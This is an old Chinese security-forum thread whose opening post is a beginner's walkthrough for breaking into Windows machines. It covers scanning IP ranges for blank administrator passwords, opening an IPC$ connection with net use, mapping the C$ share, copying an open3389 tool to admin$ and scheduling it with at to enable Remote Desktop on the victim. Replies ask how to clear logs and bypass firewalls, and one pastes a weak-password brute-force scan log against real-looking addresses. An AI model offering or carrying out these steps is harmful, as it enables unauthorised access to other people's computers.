|
 | 作者: xuebaby [xuebaby]
 论坛用户 |
登录 |
| 写这篇文章的主要是因为有一些人刚入门,想学这一类知识,却又搞不清楚该怎么做。我就说的简单点了,也希望不复杂的内容你能看得懂,呵呵 要用到的工具只有X-scan,open3389,winxp的远程登入和win2000自带的cmd,需要的软件都可以到www.5566.net里借助百度的搜索引擎找。 先用X-scan扫描一段IP,打开X-scan后,在界面上找到“设置”,然后是“扫描模块”,在里面把“开放端口”和“NT-SERVER弱口令”勾上(其余的以后学吧)。 确定以后再打开“扫描参数”,在指定IP内填入你要扫描的IP段,比如 127.0.0.1-127.0.0.254。“其他”里选择“无条件扫描”吧。 然后在“扫描参数”对话框里选择“端口相关设置”,在待检测端口里输入“139,3389”,既然是新手,就选这两个吧,别的暂时也用不上了。 参数设置好以后,开始扫描。 好了,现在我们假设127.0.0.1开着139端口,而且administrator口令为空,接下来我们要做的就是进入他的机子了。 打开win2000自带的命令行 输入 net use \\127.0.0.1\ipc$ "" /user:"administrator" 第一个双引号里的是密码,第二个双引号里是用户名。 这个时候我们已经和这台机子建立了空连接。 接下来我们看一下对方的机子里都有哪些目录是共享的 net view \\127.0.0.1 成功之后,共享目录会写在命令下面 比如 c$ disk d$ disk 我们就知道了对方机子里的C$是启用默认共享的 那么我们可以用下面这个命令把它的C盘映射到我们的机子里 net use x: \\127.0.0.1\c$ x:代表的是映射到我们机子里的盘符,c$则是对方C盘。 我们也可以把open3389这个程序copy到他的机子上,开启对方机子的终端服务,需要这么做 copy d:\3389.exe \\127.0.0.1\admin$ d:\3389.exe 指的是open3389程序在自己机子里的位置 \\127.0.0.1\admin$指的则是对方机子的c:\winnt目录下 成功的话,我们就要尝试着启动3389.exe这个程序,当然不能在映射的那个盘里直接点击,现在我们就应该要用到AT命令了,指定时间运行程序。 首先,应该知道对方机子的时间,要不然怎么确定程序在它机子上运行的时间,对吧 net time \\127.0.0.1 假设对方机子的时间是00:00吧 at \\127.0.0.1 00:05 3389.exe 00:05指的是程序指定在00:05运行 由于是copy到winnt目录下,不用指定路径,直接输入3389.exe就可以了 成功的话会显示添加了一项作业。 等到那个时间,程序成功运行的话。对方机子就会重启,完了之后就会开了远程登入的服务。 现在你要做的就只是用winxp自带的那个远程桌面登入登入他的机子了。 也许写的还不算是很简单吧,希望新手们能看得懂!呵呵 |
| 地主 发表时间: 10/05 22:33 |
 | 回复: tornadoes [tornadoes]  论坛用户 |
登录 |
|
完了之后 有日志吗?怎么清除? |
| B1层 发表时间: 10/05 23:01 |
 | 回复: totti [totti]  论坛用户 |
登录 |
|
感觉写的太弱智了点吧~? 现在的机子哪里还有那么多的空口令啊~ 如果楼主真的有本事的话就写点不通过弱口令的点子嘛~~~ 我现在急需这些东西啊~~~~~~~ |
| B2层 发表时间: 10/06 01:19 |
 | 回复: hackerkill [hackerkill] 论坛用户 |
登录 |
|
有些用的啊! |
| B3层 发表时间: 10/06 02:16 |
 | 回复: realpope [realpope] 论坛用户 |
登录 |
|
其实现在有空口令的还不少呢 我在我们局域网内扫了一下 就有一台有空口令的 |
| B4层 发表时间: 10/06 07:38 |
| 回复: xuebaby [xuebaby] 论坛用户 |
登录 |
|
我说了写给真正的新手看的 你觉得弱智的话大可不看啊 反正又不是写给你们这些所谓的"hacker"看的 |
| B5层 发表时间: 10/06 09:06 |
| 回复: xuebaby [xuebaby] 论坛用户 |
登录 |
|
关于日志的话,我也说不太清楚了 你自己去查一下有关的资料吧 反正能开启3389的话,远程桌面连接想干什么应该都蛮简单的吧! |
| B6层 发表时间: 10/06 09:10 |
 | 回复: honyry [honyry] 论坛用户 |
登录 |
|
虽然弱口令挺多但是现在网吧都有那个叫专家系列网管的软件没法运行dos级的文件哦!啊哦! |
| B7层 发表时间: 10/06 16:48 |
 | 回复: byaq008 [byaq008] 论坛用户 |
登录 |
|
3389.exe从哪下可以下载? 用远程桌面进行操作时,对方面的桌面会不会看见呀? 为什么连接上以后,用远程桌面登录时会说,连接没有启动,或都服务太忙? 哪位大虾给指点指点? |
| B8层 发表时间: 10/07 02:57 |
 | 回复: onlyu123 [onlyu123]  |
登录 |
|
老大 太好了 我感觉太好了 以前看的 真的看不懂 这就证明着我是一个真正的新手 不过我会努力的 老大 你要帮我啊 |
| B9层 发表时间: 10/11 01:47 |
 | 回复: posedong [posedong] 论坛用户 |
登录 |
|
这次我至少能看懂点了~呵呵谢谢! |
| B10层 发表时间: 10/12 01:58 |
 | 回复: surge [surge] 论坛用户 |
登录 |
|
用远程桌面进行操作时,对方面的桌面会不会看见呀? |
| B11层 发表时间: 10/19 21:37 |
 | 回复: zsun666 [zsun666] 论坛用户 |
登录 |
|
“反正能开启3389的话,远程桌面连接想干什么应该都蛮简单的吧” 就算远程桌面连接,不采取些手段的话,有些日志根本删不掉。 |
| B12层 发表时间: 10/19 22:10 |
 | 回复: qq [zpisgod] 论坛用户 |
登录 |
|
net view 看不见$共享的吧?! |
| B13层 发表时间: 10/20 00:07 |
 | 回复: Hamle [hamle] 论坛用户 |
登录 |
|
大哥,你也太理想化了把。有这样个肉鸡,还用3389干什么啊?有139弱口令,有C$.D$共享,你是sb啊!还上网干什么啊?网络的环境这复杂,你给点实用的行不,不要太FANTACY了把! 晕!教坏了新手怎么高啊! |
| B14层 发表时间: 11/27 17:35 |
 | 回复: zerosmile [zerosmile]  论坛用户 |
登录 |
|
大哥们我是一个菜鸟,我想问你们一个问题?在这个论坛里的精华帖子我也看过了。菜鸟乐园里的关于这个问题的帖子我也看过了。我的问题是我知道他的管理员帐号,密码。我已经建立了IPC连接。可是我用这COPY命令copy 1.exe \\ip\ipc$怎么提示说,什么函数出错。已复制0个文件啊。请问这是什么回事啊? [此贴被 大肉(zerosmile) 在 11月27日18时28分 编辑过] |
| B15层 发表时间: 11/27 18:26 |
 | 回复: NightColor [nightcolor]  版主 |
登录 |
|
先搞清楚$IPC是什么共享 不要来不来就急着上传 |
| B16层 发表时间: 11/27 18:28 |
| 回复: zerosmile [zerosmile] 论坛用户 |
登录 |
|
能不能讲讲解决的方法啊,我是菜鸟啊?我真很想搞懂这个问题啊 |
| B17层 发表时间: 11/27 18:36 |
 | 回复: etliwei [etliwei] 论坛用户 |
登录 |
|
晕,你先把ipc$的命令看清楚在说把! 应该是 copy 1.exe \\ip\c$(或者其他的共享盘把:《) 如果对方没看共享,你还要映射一个才可以copy的! net use x: \\ip\c$ 你什么看了很多啊,我看就是没看嘛,麻烦以后看清楚了在来问。ok? 晕死了! |
| B18层 发表时间: 11/27 20:41 |
| 回复: zerosmile [zerosmile] 论坛用户 |
登录 |
|
我已经用他的管理员密码和用户,建立了一个链接.我用"net use x: \\ip\c$"可是提示,该密码不能应用于这个用户上面.请输入用户名.我输入了之后,是请输入密码.可是这是地方键盘输不了任何东西. |
| B19层 发表时间: 11/29 12:19 |
 | 回复: xiaoshi [xiaoshi] 论坛用户 |
登录 |
|
对方有防火墙怎么办,能饶过它吗? [此贴被 零下一度(xiaoshi) 在 11月29日13时47分 编辑过] |
| B20层 发表时间: 11/29 13:56 |
 | 回复: df [tin868] 论坛用户 |
登录 |
|
[218.19.18.2]: 正在检测"NT-Server弱口令" ... [218.19.18.1]: 正在检测"NT-Server弱口令: administrator/admin" ... [218.19.18.3]: 正在检测"NT-Server弱口令: admin/!@#$%^" ... [218.19.18.11]: 正在检测"NT-Server弱口令: admin/1234" ... [218.19.18.7]: 正在检测"NT-Server弱口令: administrator/!@#$%^&" ... [218.19.18.8]: 正在检测"NT-Server弱口令: administrator/!@#$%" ... [218.19.18.1]: 正在检测"NT-Server弱口令: administrator/root" ... [218.19.18.3]: 正在检测"NT-Server弱口令: admin/!@#$%^&" ... [218.19.18.11]: 正在检测"NT-Server弱口令: admin/123456" ... [218.19.18.7]: 正在检测"NT-Server弱口令: administrator/!@#$%^&*" ... [218.19.18.4]: 正在检测"NT-Server弱口令: admin/admin" ... [218.19.18.9]: 正在检测"NT-Server弱口令: admin/admin" ... [218.19.18.10]: 正在检测"NT-Server弱口令: admin/admin" ... [218.19.18.5]: 正在检测"NT-Server弱口令: admin/admin" ... [218.19.18.2]: 正在检测"NT-Server弱口令: admin/admin" ... [218.19.18.8]: 正在检测"NT-Server弱口令: administrator/!@#$%^" ... [218.19.18.1]: 正在检测"NT-Server弱口令: administrator/1" ... [218.19.18.3]: 正在检测"NT-Server弱口令: admin/!@#$%^&*" ... [218.19.18.11]: 正在检测"NT-Server弱口令: admin/654321" ... [218.19.18.7]: 正在检测"NT-Server弱口令: administrator/server" ... [218.19.18.4]: 正在检测"NT-Server弱口令: admin/[NULL]" ... [218.19.18.9]: 正在检测"NT-Server弱口令: admin/[NULL]" ... [218.19.18.10]: 正在检测"NT-Server弱口令: admin/[NULL]" ... [218.19.18.5]: 正在检测"NT-Server弱口令: admin/[NULL]" ... [218.19.18.2]: 正在检测"NT-Server弱口令: admin/[NULL]" ... [218.19.18.8]: 正在检测"NT-Server弱口令: administrator/!@#$%^&" ... [218.19.18.1]: 正在检测"NT-Server弱口令: administrator/111" ... [218.19.18.3]: 正在检测"NT-Server弱口令: admin/server" ... [218.19.18.11]: 正在检测"NT-Server弱口令: admin/!@#$" ... [218.19.18.7]: 正在检测"NT-Server弱口令: administrator/administrator123" ... [218.19.18.4]: 正在检测"NT-Server弱口令: admin/admin" ... [218.19.18.9]: 正在检测"NT-Server弱口令: admin/admin" ... [218.19.18.10]: 正在检测"NT-Server弱口令: admin/admin" ... [218.19.18.5]: 正在检测"NT-Server弱口令: admin/admin" ... [218.19.18.2]: 正在检测"NT-Server弱口令: admin/admin" ... [218.19.18.8]: 正在检测"NT-Server弱口令: administrator/!@#$%^&*" ... [218.19.18.1]: 正在检测"NT-Server弱口令: administrator/123" ... [218.19.18.3]: 正在检测"NT-Server弱口令: admin/admin123" ... [218.19.18.11]: 正在检测"NT-Server弱口令: admin/asdf" ... [218.19.18.7]: 正在检测"NT-Server弱口令: administrator/administrator1234" ... [218.19.18.4]: 正在检测"NT-Server弱口令: admin/root" ... [218.19.18.9]: 正在检测"NT-Server弱口令: admin/root" ... [218.19.18.10]: 正在检测"NT-Server弱口令: admin/root" ... [218.19.18.5]: 正在检测"NT-Server弱口令: admin/root" ... [218.19.18.2]: 正在检测"NT-Server弱口令: admin/root" ... [218.19.18.8]: 正在检测"NT-Server弱口令: administrator/server" ... [218.19.18.1]: 正在检测"NT-Server弱口令: administrator/1234" ... [218.19.18.3]: 正在检测"NT-Server弱口令: admin/admin1234" ... [218.19.18.11]: 正在检测"NT-Server弱口令: admin/asdfgh" ... [218.19.18.7]: 正在检测"NT-Server弱口令: administrator/administrator!@#$" ... 请问这些信息怎么样看的呢?? 请问那里有那些开3389的后门程序啊?? 为什么用这个命令netstat -a IP为什么看的都是自己的信息呢?? [此贴被 df(tin868) 在 11月29日19时11分 编辑过] [此贴被 df(tin868) 在 11月29日19时27分 编辑过] |
| B21层 发表时间: 11/29 19:39 |
| 回复: Hamle [hamle] 论坛用户 |
登录 |
|
给秋天的味道: 你怎么搞的别人不会问一问嘛!你个鸟怎么说说说说个不停!大家都是想学学嘛,怎么这样对待别人呢? |
| B22层 发表时间: 11/29 21:03 |
 | 回复: liuyun6026 [liuyun6026] 论坛用户 |
登录 |
|
哎呀都说的很简单 可实际怎么就那么难呢? |
| B23层 发表时间: 11/30 23:44 |
| 回复: dooyu [dooyu] 论坛用户 |
登录 |
|
你们那些人也别在那瞎叫又没叫你们看写明了是给菜鸟看的嘛。。。 要是你厉害的话你也可以写一些更容易明白更深入一点的东西呀。。 |
| B24层 发表时间: 12/01 00:00 |
 | 回复: jake007 [jake007] 论坛用户 |
登录 |
|
up |
| B25层 发表时间: 12/02 16:30 |
 | 回复: zpsky001 [zpsky001] |
登录 |
|
嗯不错啊你写的不错啊很适合我们这些刚入门的菜鸟吗我感觉很不错啊你的QQ是多少啊我加你啊交个朋友怎么样啊 |
| B26层 发表时间: 12/02 17:01 |
 | 回复: xuruijun [xuruijun] 论坛用户 |
登录 |
|
楼住在吗?在的话,可以发这篇文章给我吗?谢谢哦・・・・ |
| B27层 发表时间: 03-12-25 00:16 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: IPC$入侵全程+开启3389服务(写给真正的新手看)